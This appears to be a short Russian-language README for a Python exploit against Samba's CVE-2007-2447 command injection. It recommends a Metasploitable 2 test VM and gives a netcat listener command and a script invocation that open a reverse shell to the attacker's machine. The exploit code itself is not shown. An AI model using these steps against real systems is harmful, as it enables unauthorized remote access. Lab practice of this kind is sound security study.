
Эксплойт на Python для CVE-2007-2447, который запускает внедрение команды в скрипт карты имён пользователей Samba для открытия обратной оболочки на уязвимых целях.
Для тестирования скрипта рекомендую использовать виртуальную машину "metasploitable 2", доступную здесь. Если эксплойт сработает, скрипт отобразит reverse shell. Чтобы установить соединение, просто откройте сессию netcat, например:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
и на моем netcat:
netcat -lnvp 1337
Результат:
netcat:
alt text
и на скрипте:
alt text
Я использовал пейлоад из шпаргалки. Ссылка доступна здесь. Вы можете заменить его на другие полезные нагрузки.